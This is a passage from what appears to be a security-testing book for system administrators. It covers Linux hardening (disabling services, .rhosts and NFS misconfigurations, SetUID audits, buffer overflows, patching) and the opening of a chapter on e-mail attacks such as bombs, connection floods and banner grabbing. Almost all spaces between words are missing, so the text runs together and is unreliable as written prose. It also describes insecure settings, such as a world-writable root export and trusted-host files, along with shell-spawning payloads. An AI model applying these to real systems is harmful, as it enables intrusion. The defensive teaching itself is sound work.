Disabletheservicesyoudon’tneed,includingRPC,HTTP,FTP,telnet,andthesmallUDPandTCPservices—anythingforwhichyoudon’thaveatruebusinessneed.Thiskeepstheservicesfromshowingupinaportscan,whichgivesanattackerlessinformation—andpresumablylessincentive—tobreakintoyoursystem.Makesurethelatestsoftwareupdatesareinstalledtoreducethechanceofexploitationifanattackerdetermineswhatservicesyou’rerunning.
FindingUnneededandUnsecuredServicesWhenyouknowwhichdaemonsandapplicationsarerunning—suchasFTP,telnet,andawebserver—it’snicetoknowexactlywhichversionsarerunningsoyoucanlookuptheirassociatedvulnerabilitiesanddecidewhethertoturnthemoff.TheNationalVulnerabilityDatabasesite(http://nvd.nist.gov)isagoodresourceforlookingupvulnerabilities.
SearchesSeveralsecuritytoolscanhelpuncovervulnerabilitiesinyourLinuxsystems.Thesetoolsmightnotidentifyallapplicationsdowntotheexactversionnumber,butthey’reaverypowerfulwayofcollectingsysteminformation.
VulnerabilitiesBeespeciallymindfulofthesecommonsecurityweaknessesinLinuxsystems:
AnonymousFTP—especiallyifitisn’tproperlyconfigured—canprovideawayforanattackertodownloadandaccessfilesonyoursystem.TelnetandFTParevulnerabletonetworkanalyzercapturesofthecleartextuserIDandpasswordtheapplicationsuse.Theirloginscanalsobebrute-forced.OldversionsofsendmailandOpenSSLhavemanysecurityissues,includingdenialofserviceflawsthatcantakesystemsoffline.R-services,suchasrlogin,rdist,rexecd,rsh,andrcp,areespeciallyvulnerabletoattackswhichrelyontrust.
ManywebserversrunonLinux,soyoucan’toverlooktheimportanceofcheckingforweaknessesinApacheaswellasTomcatorotherapplications.Forexample,acommonLinuxvulnerabilityisthatusernamescanbedeterminedviaApachewhenitdoesn’thavetheUserDirdirectivedisabledinitshttpd.conffile.Youcanexploitthisweaknessmanuallybybrowsingtowell-knownuserfolders,suchashttp://www.your~site.com/user_nameor,betteryet,byusingavulnerabilityscanner,suchasAppSpider(www.rapid7.com/products/appspider)orNexpose,toautomaticallyenumeratethesystem.Eitherway,youmaybeabletofindoutwhichLinuxusersexistandthenlaunchawebpasswordcrackingattack.Therearealsowaystoaccesssystemfiles(including/etc/passwd)viavulnerableCGIandPHPcode.IcoverhackingwebapplicationsinChapter15.
Likewise,FTPisoftenrunningunsecuredonLinuxsystems.I’vefoundLinuxsystemswithanonymousFTPenabledthatweresharingsensitivehealthcareandfinancialinformationtoeveryoneonthelocalnetwork.Talkaboutalackofaccountability!So,don’tforgettolookforthesimplestuff.WhentestingLinux,youcandigdowndeepintothekernelanddothisorthattocarryoutsomeuber-complexexploit,butit’susuallythelittlethingsthatgetyou.I’vesaiditbefore,anditdeservesmentioning
again,lookforthelow-hangingfruitonyournetworkasthatisthestuffthatwillgetyouintothemosttroublethequickest.
AnonymousFTPisoneofthemostcommonvulnerabilitiesIfindinLinux.IfyoumustrunanFTPserver,makesureit’snotsharingoutsensitiveinformationtoallofyourinternalnetworkusers,orworse,theentireworld.Inmywork,IseetheformerquiteoftenandthelatterperiodicallywhichismorethanIevershould.
ToolsThefollowingtoolscanperformmorein-depthinformationbeyondportscanningtoenumerateyourLinuxsystemsandseewhatotherscansee:
Nmapcancheckforspecificversionsoftheservicesloaded,asshowninFigure13-6.SimplyrunNmapwiththe-sVcommand-lineswitch.netstatshowstheservicesrunningonalocalmachine.Enterthiscommandwhileloggedin:
netstat–anp
ListOpenFiles(lsof)displaysprocessesthatarelisteningandfilesthatareopenonthesystem.
Torunlsof,loginandenterthiscommandataLinuxcommandprompt:lsof.Therearetonsofoptionsavailablevialsof–h,suchaslsof–I+D/var/logtoshowwhichlogfilesarecurrentlyinuseoverwhichnetworkconnections.Thelsofcommandcancomeinhandywhenyoususpectthatmalwarehasfounditswayontothesystem.
Figure13-6:UsingNmaptocheckapplicationversions.
CountermeasuresagainstattacksonunneededservicesYoucanandshoulddisabletheunneededservicesonyourLinuxsystems.ThisisoneofthebestwaystokeepyourLinuxsystemsecure.Likereducingthenumberofentrypoints(suchasopendoorsandwindows)intoyourhouse,themoreentrypointsyoueliminate,thefewerplacesanintrudercanbreakin.
DisablingunneededservicesThebestmethodofdisablingunneededservicesdependsonwhetherthedaemonisloadedinthefirstplace.Youhaveseveralplacestodisableservices,dependingontheversionofLinuxyou’rerunning.
Ifyoudon’tneedtorunaparticularservice,takethesaferoute:Turnitoff!Justgivepeopleonthenetworkamplewarningthatit’sgoingtohappenintheeventsomeoneneedstheservicefortheirwork.
inetd.conf(orxinetd.conf)
Ifitmakesgoodbusinesssense—thatis,ifyoudon’tneedthem—disableunneededservicesbycommentingouttheloadingofdaemonsyoudon’tuse.Followthesesteps:
1. EnterthefollowingcommandattheLinuxprompt:ps-aux
TheprocessID(PID)foreachdaemon,includinginetd,islistedonthescreen.InFigure13-7,thePIDforthesshd(SecureShelldaemon)is646.
2. MakenoteofthePIDforinetd.3. Open/etc/inetd.confintheLinuxtexteditorvibyenteringthefollowing
command:vi/etc/inetd.conf
Or/etc/xinetd.conf
4. Whenyouhavethefileloadedinvi,enabletheinsert(edit)modebypressingI.
5. Movethecursortothebeginningofthelineofthedaemonthatyouwanttodisable,suchashttpd(webserverdaemon),andtype#atthebeginningoftheline.
Thisstepcommentsoutthelineandpreventsitfromloadingwhenyoureboottheserverorrestartinetd.It’salsogoodforrecordkeepingandchangemanagement.
6. Toexitviandsaveyourchanges,pressEsctoexittheinsertmode,type:wq,
andthenpressEnter.
Thistellsvithatyouwanttowriteyourchangesandquit.
7. RestartinetdbyenteringthiscommandwiththeinetdPID:kill–HUPPID
Figure13-7:ViewingtheprocessIDsforrunningdaemonsbyusingps-aux.
chkconfig
Ifyoudon’thaveaninetd.conffile(orit’sempty),yourversionofLinuxisprobablyrunningthexinetdprogram—amoresecurereplacementforinetd—tolistenforincomingnetworkapplicationrequests.Youcaneditthe/etc/xinetd.conffileifthisisthecase.Formoreinformationontheusageofxinetdandxinetd.conf,entermanxinetdormanxinetd.confataLinuxcommandprompt.Ifyou’rerunningRedHat7.0orlater,youcanrunthe/sbin/chkconfigprogramtoturnoffthedaemonsyoudon’twanttoload.
Youcanalsoenterchkconfig—listatacommandprompttoseewhatservicesareenabledinthexinetd.conffile.
Ifyouwanttodisableaspecificservice,saysnmp,enterthefollowing:chkconfig--delsnmpd
Youcanusethechkconfigprogramtodisableotherservices,suchasFTP,telnet,andwebserver.
AccesscontrolTCPWrapperscancontrolaccesstocriticalservicesthatyourun,suchasFTPorHTTP.ThisprogramcontrolsaccessforTCPservicesandlogstheirusage,helpingyou
controlaccessviahostnameorIPaddressandtrackmaliciousactivities.
YoucanfindmoreinformationaboutTCPWrappersfromftp://ftp.porcupine.org/pub/security/index.html.
Alwaysmakesurethatyouroperatingsystemandtheapplicationsrunningonitarenotopentotheworld(oryourinternalnetworkwherethatmightmatter)byensuringthatreasonablepasswordrequirementsareinplace.Don’tforgettodisableanonymousFTPunlessyouabsolutelyneedit.Evenifyoudo,limitsystemaccesstoonlythosewithabusinessneedtoaccesssensitiveinformation.
Securingthe.rhostsandhosts.equivFilesLinux—andalltheflavorsofUNIX—arefile-basedoperatingsystems.Practicallyeverythingthat’sdoneonthesysteminvolvesthemanipulationoffiles.ThisiswhysomanyattacksagainstLinuxareatthefilelevel.
Hacksusingthehosts.equivand.rhostsfilesIfhackerscancaptureauserIDandpasswordbyusinganetworkanalyzerorcancrashanapplicationandgainrootaccessviaabufferoverflow,onethingtheylookforiswhatusersaretrustedbythelocalsystem.That’swhyit’scriticaltoassessthesefilesyourself.The/etc/hosts.equivand.rhostsfileslistthisinformation.
hosts.equivThe/etc/hosts.equivfilewon’tgiveawayrootaccessinformation,butitdoesspecifywhichaccountsonthesystemcanaccessservicesonthelocalhost.Forexample,iftribewerelistedinthisfile,allusersonthetribesystemwouldbeallowedaccess.Aswiththe.rhostsfile,externalhackerscanreadthisfileandthenspooftheirIPaddressandhostnametogainunauthorizedaccesstothelocalsystem.Attackerscanalsousethenameslocatedinthe.rhostsandhosts.equivfilestolookfornamesofothercomputerstoexploit.
.rhostsThehighly-important$home/.rhostsfilesinLinuxspecifywhichremoteuserscanaccesstheBerkeleySoftwareDistribution(BSD)r-commands(suchasrsh,rcp,andrlogin)onthelocalsystemwithoutapassword.Thisfileisinaspecificuser’s(includingroot)homedirectory,suchas/home/jsmith.A.rhostsfilemaylooklikethis:
tribescott
tribeeddie
ThisfileallowsusersScottandEddieontheremote-systemtribetologintothelocalhostwiththesameprivilegesasthelocaluser.Ifaplussign(+)isenteredintheremote-hostanduserfields,anyuserfromanyhostcouldlogintothelocalsystem.Thehackercanaddentriesintothisfilebyusingeitherofthesetricks:
ManuallymanipulatingthefileRunningascriptthatexploitsanunsecuredCommonGatewayInterface(CGI)scriptonaweb-serverapplicationthat’srunningonthesystem
Thisconfigurationfileisaprimetargetforamaliciousattack.OnmostLinuxsystemsI’vetested,thesefilesaren’tenabledbydefault.However,ausercancreateoneinhisorherhomedirectoryonthesystem—intentionallyoraccidentally—whichcancreateamajorsecurityholeonthesystem.
Countermeasuresagainst.rhostsandhosts.equiv
fileattacksUsebothofthefollowingcountermeasurestopreventhackerattacksagainstthe.rhostsandhosts.equivfilesinyourLinuxsystem.
DisablingcommandsAgoodwaytopreventabuseofthesefilesistodisabletheBSDr-commands.Thiscanbedoneintwoways:
Commentoutthelinesstartingwithshell,login,andexecininetd.conf.Edittherexec,rlogin,andrshfileslocatedinthe/etc/xinetd.ddirectory.Openeachfileinatexteditorandchangedisable=notodisable=yes,asshowninFigure13-8.
Figure13-8:Therexecfileshowingthedisableoption.
InRedHatEnterpriseLinux,youcandisabletheBSDr-commandswiththesetupprogram:
1. Entersetupatacommandprompt.2. Entersystem-config-services.3. SelecttheappropriateservicesandclickDisable.
BlockingaccessAcoupleofcountermeasurescanblockrogueaccessofthe.rhostsandhosts.equivfiles:
Blockspoofedaddressesatthefirewall,asIoutlineinChapter9.Setthereadpermissionsforeachfile’sowneronly.
.rhosts:Enterthiscommandineachuser’shomedirectory:
chmod600.rhosts
hosts.equiv:Enterthiscommandinthe/etcdirectory:chmod600hosts.equiv
YoucanalsouseOpenSourceTripwire(http://sourceforge.net/projects/tripwire)tomonitorthesefilesandalertyouwhenaccessisobtainedorchangesaremade.
AssessingtheSecurityofNFSTheNetworkFileSystem(NFS)isusedtomountremotefilesystems(similartosharesinWindows)fromthelocalmachine.GiventheremoteaccessnatureofNFS,itcertainlyhasitsfairshareofhacks.IcoveradditionalstoragevulnerabilitiesandhacksinChapter16.
NFShacksIfNFSwassetupimproperlyoritsconfigurationhasbeentamperedwith—namely,the/etc/exportsfilecontainingasettingthatallowstheworldtoreadtheentirefilesystem—remotehackerscaneasilyobtainremoteaccessanddoanythingtheywantonthesystem.Assumingnoaccesscontrollist(ACL)isinplace,allittakesisaline,suchasthefollowing,inthe/etc/exportsfile:
/rw
Thislinesaysthatanyonecanremotelymounttherootpartitioninaread-writefashion.Ofcourse,thefollowingconditionsmustalsobetrue:
TheNFSdaemon(nfsd)mustberunning,alongwiththeportmapdaemonthatwouldmapNFStoRPC.ThefirewallmustallowtheNFStrafficthrough.TheremotesystemsthatareallowedintotheserverrunningtheNFSdaemonmustbeplacedintothe/etc/hosts.allowfile.
Thisremote-mountingcapabilityiseasytomisconfigure.It’softenrelatedtoaLinuxadministrator’smisunderstandingofwhatittakestoshareouttheNFSmountsandresortingtotheeasiestwaypossibletogetitworking.Ifsomeonecangainremoteaccess,thesystemistheirs.
CountermeasuresagainstNFSattacksThebestdefenseagainstNFShackingdependsonwhetheryouactuallyneedtheservicerunning.
Ifyoudon’tneedNFS,disableit.IfyouneedNFS,implementthefollowingcountermeasures:
FilterNFStrafficatthefirewall—typically,UDPport111(theportmapperport)ifyouwanttofilterallRPCtraffic.AddnetworkACLstolimitaccesstospecifichosts.Makesurethatyour/etc/exportsand/etc/hosts.allowfilesareconfiguredproperlytokeeptheworldoutsideyournetwork.
CheckingFilePermissionsInLinux,specialfiletypesallowprogramstorunwiththefileowner’srights:
SetUID(foruserIDs)SetGID(forgroupIDs)
SetUIDandSetGIDarerequiredwhenauserrunsaprogramthatneedsfullaccesstothesystemtoperformitstasks.Forexample,whenauserinvokesthepasswdprogramtochangehisorherpassword,theprogramisactuallyloadedandrunwithoutrootoranyotheruser’sprivileges.Thisisdonesothattheusercanruntheprogramandtheprogramcanupdatethepassworddatabasewithouttherootaccountbeinginvolvedintheprocess.
FilepermissionhacksBydefault,rogueprogramsthatrunwithrootprivilegescanbeeasilyhidden.Anexternalattackerormaliciousinsidermightdothistohidehackingfiles,suchasrootkits,onthesystem.ThiscanbedonewithSetUIDandSetGIDcodingintheirhackingprograms.
CountermeasuresagainstfilepermissionattacksYoucantestforrogueprogramsbyusingbothmanualandautomatedtestingmethods.
ManualtestingThefollowingcommandscanidentifyandprinttothescreenSetUIDandSetGIDprograms:
ProgramsthatareconfiguredforSetUID:find/-perm-4000–print
ProgramsthatareconfiguredforSetGID:find/-perm-2000–print
Filesthatarereadablebyanyoneintheworld:find/-perm-2-typef–print
Hiddenfiles:find/-name".*"
Youprobablyhavehundredsoffilesineachofthesecategories,sodon’tbealarmed.Whenyoudiscoverfileswiththeseattributesset,youneedtomakesurethattheyareactuallysupposedtohavethoseattributesbyresearchinginyourdocumentationorontheInternet,orbycomparingthemtoaknownsecuresystemordatabackup.
KeepaneyeonyoursystemstodetectanynewSetUIDorSetGIDfilesthatsuddenlyappear.
AutomatictestingYoucanuseanautomatedfilemodificationauditingprogramtoalertyouwhenthesetypesofchangesaremade.ThisiswhatIrecommend—it’saloteasieronanongoingbasis:
Achange-detectionapplication,suchasOpenSourceTripwire,canhelpyoukeeptrackofwhatchangedandwhen.Afile-monitoringprogram,suchasCOPS(pointyourwebbrowsertoftp://ftp.cerias.purdue.edu/pub/tools/unix/scanners/cops),findsfilesthathavechangedinstatus(suchasanewSetUIDorremovedSetGID).
FindingBufferOverflowVulnerabilitiesRPCandothervulnerabledaemonsarecommontargetsforbuffer-overflowattacks.Bufferoverflowattacksareoftenhowthehackercangetintomodifysystemfiles,readdatabasefiles,andmore.
AttacksInabufferoverflowattack,theattackereithermanuallysendsstringsofinformationtothevictimLinuxmachineorwritesascripttodoso.Thesestringscontainthefollowing:
Instructionstotheprocessortobasicallydonothing.Maliciouscodetoreplacetheattackedprocess.Forexample,exec(“/bin/sh”)createsashellcommandprompt.Apointertothestartofthemaliciouscodeinthememorybuffer.
Ifanattackedapplication(suchasFTPorRPC)isrunningasroot(certainprogramsdo),thissituationcangiveattackersrootpermissionsintheirremoteshells.SpecificexamplesofvulnerablesoftwarerunningonLinuxareSamba,MySQL,andFirefox.Dependingontheversion,thissoftwarecanbeexploitedusingcommercialorfreetoolssuchasMetasploit(www.metasploit.com)toobtainremotecommandprompts,addbackdooruseraccounts,changeownershipoffiles,andmore.IcoverMetasploitinChapter12.
CountermeasuresagainstbufferoverflowattacksThreemaincountermeasurescanhelppreventbuffer-overflowattacks:
Disableunneededservices.ProtectyourLinuxsystemswitheitherafirewallorahost-basedintrusionpreventionsystem(IPS).
Enableanotheraccesscontrolmechanism,suchasTCPWrappers,thatauthenticatesuserswithapassword.
Don’tjustenableaccesscontrolsviaanIPaddressorhostname.Thatcaneasilybespoofed.
Asalways,makesurethatyoursystemshavebeenupdatedwiththelatestkernelandsoftwareupdates.
CheckingPhysicalSecuritySomeLinuxvulnerabilitiesinvolvethebadguyactuallybeingatthesystemconsole—somethingthat’sentirelypossiblegiventheinsiderthreatsthateveryorganizationfaces.
PhysicalsecurityhacksIfanattackerisatthesystemconsole,anythinggoes,includingrebootingthesystem(evenifnooneisloggedin)bypressingCtrl+Alt+Delete.Afterthesystemisrebooted,theattackercanstartitinsingle-usermode,whichallowsthehackertozeroouttherootpasswordorpossiblyevenreadtheentireshadowpasswordfile.IcoverpasswordcrackinginChapter8.
CountermeasuresagainstphysicalsecurityattacksEdityour/etc/inittabfileandcommentout(placea#signinfrontof)thelinethatreadsca::ctrlaltdel:/sbin/shutdown-t3-rnow,showninthelastlineofFigure13-9.ThesechangeswillpreventsomeonefromrebootingthesystembypressingCtrl+Alt+Delete.BeforewarnedthatthiswillalsopreventyoufromlegitimatelyusingCtrl+Alt+Delete.
Figure13-9:/etc/inittabshowingthelinethatallowsaCtrl+Alt+Deleteshutdown.
ForLinux-basedlaptops,usediskencryptionsoftware,suchasWinMagic(www.winmagic.com)andSymantec(www.symantec.com).Ifyoudon’t,whenalaptopislostorstolen,youcouldverywellhaveadatabreachonyourhandsandallthestate,federal,compliance,anddisclosurelawrequirementsthatgoalongwithit.Notgood!
Ifyoubelievethatsomeonehasrecentlygainedaccesstoyoursystem,eitherphysicallyorbyexploitingavulnerability,suchasaweakpasswordorbufferoverflow,youcanuselast,theprogram,toviewthelastfewloginsintothesystemtocheckforstrangeloginIDsorlogintimes.Thisprogramperusesthe/var/log/wtmpfileanddisplaystheuserswhologgedinlast.Youcanenterlast|headtoviewthefirstpartofthefile(thefirsttenlines)ifyouwanttoseethemostrecentlogins.
PerformingGeneralSecurityTestsYoucanassesscritical,andoftenoverlooked,securityissuesonyourLinuxsystems,suchasthefollowing:
Misconfigurationsorunauthorizedentriesintheshadowpasswordfiles,whichcouldprovidecovertsystemaccessPasswordcomplexityrequirementsUsersequivalenttorootSuspiciousautomatedtasksconfiguredincron,thescriptschedulerprogramSignaturechecksonsystembinaryfilesChecksforrootkitsNetworkconfiguration,includingmeasurestopreventpacketspoofingandotherdenialofservice(DoS)attacksPermissionsonsystemlogfiles
Youcandoalltheseassessmentsmanually—orbetteryet,useanautomatedtooltodoitforyou!Figure13-10showstheinitiationoftheTigersecurity-auditingtool(www.nongnu.org/tiger),andFigure13-11showsaportionoftheauditresults.Talkaboutsomegreatbangfornobuckwiththistool!
Figure13-10:RunningtheTigersecurity-auditingtool.
Figure13-11:PartialoutputoftheTigertool.
AlternativestoTigerincludeLinuxSecurityAuditingTool(LSAT;http://usat.sourceforge.net)aswellasBastilleUNIX(http://bastille-linux.sourceforge.net).
PatchingLinuxOngoingpatchingisperhapsthebestthingyoucandotoenhanceandmaintainthesecurityofyourLinuxsystems.RegardlessoftheLinuxdistributionyouuse,usingatooltoassistinyourpatchingeffortsmakesyourjobaloteasier.
IoftenfindLinuxiscompletelyoutofthepatchmanagementloop.WiththefocusonpatchingWindows,manynetworkadministratorsforgetabouttheLinuxsystemstheyhaveontheirnetwork.Don’tfallintothistrap.
DistributionupdatesThedistributionprocessisdifferentoneverydistributionofLinux.Youcanusethefollowingtools,basedonyourspecificdistribution:
RedHat:ThefollowingtoolsupdateRedHatLinuxsystems:RPMPacketManager,whichistheGUI-basedapplicationthatrunsintheRedHatGUIdesktop.Itmanagesfileswithan.rpmextensionthatRedHatandotherfreewareandopensourcedevelopersusetopackagetheirprograms.RPMPacketManagerwasoriginallyaRedHat-centricsystembutisnowavailableonmanyversionsofLinux.up2date,acommand-line,text-basedtoolthat’sincludedinRedHat,Fedora,andCentOS.
Debian:YoucanusetheDebianpackagemanagementsystem(dpkg)includedwiththeoperatingsystemtoupdateDebianLinuxsystems.Slackware:YoucanusetheSlackwarePackageTool(pkgtool)includedwiththeoperatingsystemtoupdateSlackwareLinuxsystems.SUSE:SUSELinuxincludesYaST2softwaremanagement.
InadditiontoLinuxkernelandgeneraloperatingsystemupdates,makesureyoupayattentiontoApache,OpenSSL,OpenSSH,MySQL,PHP,andothersoftwareonyoursystems.Theymayhaveweaknessesthatyoudon’twanttooverlook.
Multi-platformupdatemanagersCommercialtoolshaveadditionalfeatures,suchascorrelatingpatcheswithvulnerabilitiesandautomaticallydeployingappropriatepatches.CommercialtoolsthatcanhelpwithLinuxpatchmanagementincludeManageEngine(www.manageengine.com/products/desktop-central/linux-management.html),GFI
LanGuard(www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard/specifications/patch-management-for-operating-
systems),andDellKACESystemsManagementAppliance(http://software.dell.com/products/kace-k1000-systems-management-appliance/patch-management-security.aspx).
HackingApplications
ReadevenmoregreatDummiescontentatwww.dummies.com/extras/hacking.
Inthispart…Well,thisbookhascoveredalltheessentialsecuritytestsfromthenontechnicaltothenetworkandontomobiledevicesandoperatingsystems.WhatIhaven’tyetcoveredaretheapplicationsthatrunontopofallthisaswellasdatabaseserversandstoragesystemsthatensurethedataisavailablewhenweneedit.
Thefirstchapterinthispartcoversvariousmessagingsystemhacksandcountermeasuresfore-mailandVoiceoverIP(VoIP)systems.Next,thispartlooksatwebexploits,alongwithsomecountermeasurestosecurewebsitesandapplicationsfromtheelements.Finally,thispartcoversattacksagainstdatabaseserversandstoragesystems.Itcoversbothstructureddatafoundinvariousdatabasesystemsandunstructureddata,otherwiseknownasfilesscatteredacrossthenetworkwaitingtobeexploited.
CommunicationandMessagingSystemsInThisChapter
Attackinge-mailsystems
Assailinginstantmessaging
AssaultingVoiceoverIPapplications
Communicationsystemssuchase-mailandVoiceoverIP(VoIP)oftencreatevulnerabilitiesthatpeopleoverlook.Why?Well,frommyexperience,messagingsoftware—bothattheserverandclientlevel—isvulnerablebecausenetworkadministratorsoftenbelievethatfirewallsandantivirussoftwareareallthat’sneededtokeeptroubleaway,ortheysimplyforgetaboutsecuringthesesystemsaltogether.
Inthischapter,Ishowyouhowtotestforcommone-mailandVoIPissues.Ialsooutlinekeycountermeasurestohelppreventthesehacksagainstyoursystems.
IntroducingMessagingSystemVulnerabilities
Practicallyallmessagingapplicationsarehackingtargetsonyournetwork.Giventheproliferationandbusinessdependenceone-mail,justaboutanythingisfairgame.DittowithVoIP.It’sdownrightscarywhatpeoplewithillintentcandowithit.
Withmessagingsystems,oneunderlyingweaknessesisthatmanyofthesupportingprotocolsweren’tdesignedwithsecurityinmind—especiallythosedevelopedseveraldecadesagowhensecuritywasn’tnearlytheissueitistoday.Thefunnythingisthatevenmodern-daymessagingprotocols—oratleasttheimplementationoftheprotocols—arestillsusceptibletoserioussecurityproblems.Furthermore,convenienceandusabilityoftenoutweightheneedforsecurity.
Manyattacksagainstmessagingsystemsarejustminornuisances;otherscaninflictseriousharmonyourinformationandyourorganization’sreputation.Maliciousattacksagainstmessagingsystemsincludethefollowing:
TransmittingmalwareCrashingserversObtainingremotecontrolofworkstationsCapturinginformationwhileittravelsacrossthenetworkPerusinge-mailsstoredonserversandworkstationsGatheringmessaging-trendinformationvialogfilesoranetworkanalyzerthatcantipofftheattackeraboutconversationsbetweenpeopleandorganizations(oftencalledtrafficanalysisorsocialnetworkanalysis)CapturingandreplayingphoneconversationsGatheringinternalnetworkconfigurationinformation,suchashostnamesandIPaddresses
Theseattackscanleadtosuchproblemsasunauthorized—andpotentiallyillegal—disclosureofsensitiveinformation,aswellaslossofinformationaltogether.
RecognizingandCounteringE-MailAttacks
Thefollowingattacksexploitthemostcommone-mailsecurityvulnerabilitiesI’veseen.Thegoodnewsisthatyoucaneliminateorminimizemostofthemtothepointwhereyourinformationisnotatrisk.Someoftheseattacksrequirethebasichackingmethodologies:gatheringpublicinformation,scanningandenumeratingyoursystems,andfindingandexploitingthevulnerabilities.Otherscanbecarriedoutbysendinge-mailsorcapturingnetworktraffic.
E-mailbombsE-mailbombsattackbycreatingdenialofservice(DoS)conditionsagainstyoure-mailsoftwareandevenyournetworkandInternetconnectionbytakingupalargeamountofbandwidthand,sometimes,requiringlargeamountsofstoragespace.E-mailbombscancrashaserverandprovideunauthorizedadministratoraccess—yes,evenwithtoday’sseeminglyendlessstoragecapacities.
AttachmentsAnattackercancreateanattachment-overloadattackbysendinghundredsorthousandsofe-mailswithverylargeattachmentstooneormorerecipientsonyournetwork.
Attacksusinge-mailattachments
Attachmentattackshaveacoupleofgoals:
Thewholee-mailservermightbetargetedforacompleteinterruptionofservicewiththesefailures:
Storageoverload:Multiplelargemessagescanquicklyfillthetotalstoragecapacityofane-mailserver.Ifthemessagesaren’tautomaticallydeletedbytheserverormanuallydeletedbyindividualuseraccounts,theserverwillbeunabletoreceivenewmessages.
ThiscancreateaseriousDoSproblemforyoure-mailsystem,eithercrashingitorrequiringyoutotakeyoursystemofflinetocleanupthejunkthathasaccumulated.A100MBfileattachmentsenttentimesto100userscantake100GBofstoragespace.Thatcanaddup!
Bandwidthblocking:Anattackercancrashyoure-mailserviceorbringittoacrawlbyfillingtheincomingInternetconnectionwithjunk.Evenifyoursystemautomaticallyidentifiesanddiscardsobviousattachmentattacks,thebogusmessageseatresourcesanddelayprocessingofvalidmessages.
Anattackonasinglee-mailaddresscanhaveseriousconsequencesiftheaddress
isforanimportantuserorgroup.
Countermeasuresagainste-mailattachmentattacks
Thesecountermeasurescanhelppreventattachment-overloadattacks:
Limitthesizeofeithere-mailsore-mailattachments.Checkforthisoptioninyoure-mailserver’sconfigurationsettings(suchasthoseprovidedinMicrosoftExchange),youre-mailcontentfilteringsystem,andevenatthee-mailclientlevel.
Limiteachuser’sspaceontheserver.Thisdenieslargeattachmentsfrombeingwrittentodisk.Limitmessagesizesforinboundandevenoutboundmessagesshouldyouwanttopreventauserfromlaunchingthisattackfrominsideyournetwork.Ifindafewgigabytesisagoodlimit,butitalldependsonyournetworksize,storageavailability,businessculture,andsoon,sothinkthroughthisonecarefullybeforeputtinganythinginplace.
ConsiderusingSFTPorHTTPinsteadofe-mailforlargefiletransfers.Therearenumerouscloud-basedfiletransferservicesavailablesuchasDropboxandBox.Youcanalsoencourageyouruserstousedepartmentalsharesorpublicfolders.Bydoingso,youcanstoreonecopyofthefileonaserverandhavetherecipientdownloadthefileonhisorherownworkstation.
Contrarytopopularbeliefanduse,thee-mailsystemshouldnotbeaninformationrepository,butthat’sexactlywhate-mailhasevolvedinto.Ane-mailserverusedforthispurposecancreateunnecessarylegalandregulatoryrisksandcanturnintoadownrightnightmareifyourbusinessreceivesane-discoveryrequestrelatedtoalawsuit.Animportantpartofyoursecurityprogramistodevelopaninformationclassificationandretentionprogramtohelpwithrecordsmanagement.Butdon’tgoitalone.Getotherssuchasyourlawyer,HRmanager,andCIOinvolved.Thisnotonlyhelpsensuretherightpeopleareonboardbutitcanhelpensureyourbusinessdoesn’tgetintotroubleforholdingtoomany—ortoofew—electronicrecordsintheeventofalawsuitorinvestigation.
ConnectionsAhackercansendahugenumberofe-mailssimultaneouslytoaddressesinyoure-mailsystem.Malwarethat’spresentonyournetworkcandothesamethingfrominsideyournetworkifthere’sanopenSimpleMailTransferProtocol(SMTP)relayonyournetwork(whichisoftenthecase).(Moreaboutthatfollows.)TheseconnectionattackscancausetheservertogiveuponservicinganyinboundoroutboundTCPrequests.Thissituationcanleadtoacompleteserverlockuporacrash,oftenresultinginaconditioninwhichtheattackerisallowedadministratororrootaccesstothesystem.
Attacksusingfloodsofe-mails
Anattackusingafloodofe-mailsisoftencarriedoutinspamattacksandotherdenialofserviceattempts.
Countermeasuresagainstconnectionattacks
Prevente-mailattacksasfaroutonyournetworkperimeterasyoucan.Themoretrafficormaliciousbehavioryoukeepoffyoure-mailserversandclients,thebetter.
Manye-mailserversallowyoutolimitthenumberofresourcesusedforinboundconnections,asshownintheMaximumnumberofsimultaneousthreadssettingforIceWarpe-mailserverinFigure14-1.Thissettingiscalleddifferentthingsfordifferente-mailserversande-mailfirewalls,socheckyourdocumentation.Completelystoppinganunlimitednumberofinboundrequestscanbeimpossible.However,youcanminimizetheimpactoftheattack.Thissettinglimitstheamountofserverprocessortime,whichcanhelpduringaDoSattack.
Figure14-1:Limitingthenumberofresourcesthathandleinboundmessages.
Eveninlargecompanies,orifyou’reusingacloud-basede-mailservicesuchasOffice365,there’slikelynoreasonthatthousandsofinbounde-maildeliveriesshouldbenecessarywithinashorttimeperiod.
E-mailserverscanbeprogrammedtodelivere-mailstoaserviceforautomatedfunctions,suchascreatethise-commerceorderwhenamessagefromthisaccountisreceived.IfDoSprotectionisn’tbuiltintothesystem,anattackercancrashboththeserverandtheapplicationthatreceivesthesemessagesandpotentiallycreatee-commerceliabilitiesandlosses.Thiscanhappenmoreeasily
one-commercewebsiteswhenCAPTCHA(shortforCompletelyAutomatedPublicTuringtesttotellComputersandHumansApart)isnotusedonforms.IcoverwebapplicationsecurityinChapter15.
Automatede-mailsecuritycontrolsYoucanimplementthefollowingcountermeasuresasanadditionallayerofsecurityforyoure-mailsystems:
Tarpitting:Tarpittingdetectsinboundmessagesdestinedforunknownusers.Ifyoure-mailserversupportstarpitting,itcanhelppreventspamorDoSattacksagainstyourserver.Ifapredefinedthresholdisexceeded—say,morethan100messagesinoneminute—thetarpittingfunctioneffectivelyshunstrafficfromthesendingIPaddressforaperiodoftime.E-mailfirewalls:E-mailfirewallsandcontent-filteringapplicationsfromvendorssuchasSymantecandBarracudaNetworkscangoalongwaytowardspreventingvariouse-mailattacks.Thesetoolsprotectpracticallyeveryaspectofane-mailsystem.Perimeterprotection:Althoughnote-mail-specific,manyfirewallandIPSsystemscandetectvariouse-mailattacksandshutofftheattackerinrealtime.Thiscancomeinhandyduringanattack.CAPTCHA:UsingCAPTCHAonweb-basede-mailformscanhelpminimizetheimpactofautomatedattacksandlessenyourchancesofe-mailfloodinganddenialofservice—evenwhenyou’reperformingseeminglybenignwebvulnerabilityscans.Thesebenefitsreallycomeinhandywhentestingyourwebsitesandapplications,asIdiscussinChapter15.
BannersWhenhackingane-mailserver,ahacker’sfirstorderofbusinessisperformingabasicbannergrabtoseewhetherhecandiscoverwhate-mailserversoftwareisrunning.ThisisoneofthemostcriticalteststofindoutwhattheworldknowsaboutyourSMTP,POP3,andIMAPservers.
GatheringinformationFigure14-2showsthebannerdisplayedonane-mailserverwhenabasictelnetconnectionismadeonport25(SMTP).Todothis,atacommandprompt,simplyentertelnetipor_hostname_of_your_server25.ThisopensatelnetsessiononTCPport25.
Figure14-2:AnSMTPbannershowingserver-versioninformation.
